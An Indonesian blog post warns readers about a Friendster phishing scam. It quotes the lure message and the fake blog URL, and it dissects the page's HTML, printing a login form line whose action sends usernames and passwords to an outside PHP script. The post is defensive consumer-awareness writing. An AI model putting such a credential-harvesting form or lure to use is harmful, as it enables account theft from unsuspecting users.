Ternyata sampe sekarang friendster blog masih aja terbuka lebar untuk siapa aja melakukan tindakan ga bener..
Pernah dapet message seperti ini di friendster?
Eghh ad Cow2 cEw Show gt degh..ank2 Jkt niehh...Hasil Y!ntai NiEh..!! login Di -- http://gutyi.blogs.friendster.com...
Kalo pernah, hati-hati...
Boleh kamu lihat isi URL tersebut, tapi jangan sekali-kali login..
Karena yang kamu lihat saat itu adalah web friendster palsu atau
saat ini terkenal dengan istilah Web Phising..
Penipuan dengan cara menyalin tampilan pada web aslinya yang padahal ketika ada user yang menginputkan informasi account loginnya, maka form tersebut akan mengirimkan account yang diinput tadi ke website orang iseng yang melakukan phising tersebut..
Nah setelah informasi login tersebut sudah terkirim, sekarang orang iseng tadi akan bebas untuk login ke account friendstermu dan melakukan hal-hal yang .. mmm saya juga tidak tau deh.. seiseng apa dia.
Kira-kira apa hayo, coba ya kita list:
- Ganti nama kamu (ah ga masalah)
- Ganti profile kamu (eh.. yang mana ni?)
- Ganti foto kamu (he.. masa sih?)
- Ganti password kamu (wedew.. ga bisa login dong)
- Melakukan tindakan yang mengatas namakan kamu
- Hanya sekedar login, kirim message sebagai kamu untuk menyebarkan phising tersebut
- yaaaa.. tergantung orang iseng tersebut lah
So pencegahannya?
sederhana.. seperti yang sudah saya jelaskan sebelumnya..
Jangan asal login... pastikan dulu bahwa tempat kamu login adalah web aslinya..
Tau yahoomail? Nah yahoomail sekarang sudah dilengkapi preventor password theft,
User bisa tau dan yakin bahwa form tersebut merupakan form asli yahoo mail dan bukan form buatan orang iseng yang kadang sangat mirip sekali dengan yahoomail asli.
Di yahoomail, user dapat memasukan image dia dan bla.. bla.. bla.. baca sendiri di yahoomail mengenai prevent password theft..
Okey... sekarang kita coba periksa kebenaran, apakah alamat
http://gutyi.blogs.friendster.com
Telah melakukan phising??
Secara harafiah kalo temen-temen familiar dengan friendster pasti akan berasumsi bahwa URL tersebut adalah URL dari friendster blog punya si gutyi.. yang secara jelas, ga mungkin ketika diakses, malah minta login friendster, ya gak?
Kalo ga percaya coba aja kamu jangan login friendster dulu (atau segeralah logout) dan lihat ke
(Kita coba nama orang yang merupakan nama familiar waktu kita SD)
http://budi.blogs.friendster.com/
Pasti akan keluar blognya si budi tanpa kita harus login
(sori ni mas Bud..)
ye kan??
Nah berbeda dengan URL pertama tadi, punya si gutyi. Yang nongol malah:
Halaman web yang mirip banget dengan halaman depan friendster dan terdapat tulisan
"You must login to see this blog"
wew... curiga dong.. Coba ah liat html code dari formnya..
Nah yang kita dapet ada tulisan gini:
< name="login_form" method="post" action="http://maxbestprofit.com/kue1.php">
Logikanya kalo web friendster, pasti ngirim nilai form yang diinput user pasti ke friendster dong.. karna dia yang punya database user2 friendster...
Ya sudahlah..
Kalo kamu cobain akses ke http://maxbestprofit.com,
Ternyata si orang iseng tersebut melakukan redirect ke www.google.com
Dan ketika kamu coba untuk iseng memasukan kata/kalimat asal ke form dan kamu klik login, maka datanya akan terkirim ke http://maxbestprofit.com/kue1.php dan selanjutnya akan di redirect ke friendster.com hehehe..
Nah kue1.php itu kira-kira apa ya?
Dapat ditebak adalah file PHP yang menangkap variable dari form palsu tersebut.
wew.. sebenarnya ada teknik pencurian account friendster yang lain, tapi kali ini rasanya ini aja dulu. Informasi ini pertama saya dapatkan dari rekan kerja saya dikantor (thanx.. mr.Ali). Kemudian barusan saya cek message friendster saya, ternyata saya telah dikirimi message oleh 2 orang kenalan saya yang isi messagenya merupakan ajakan untuk melihat blog si gutyi hehehe..
Well pesan saya buat mr. Gutyi..
Semoga iseng-isengnya ga terlalu edan... hehehe
Kasihanilah orang yang tidak sepintar dirimu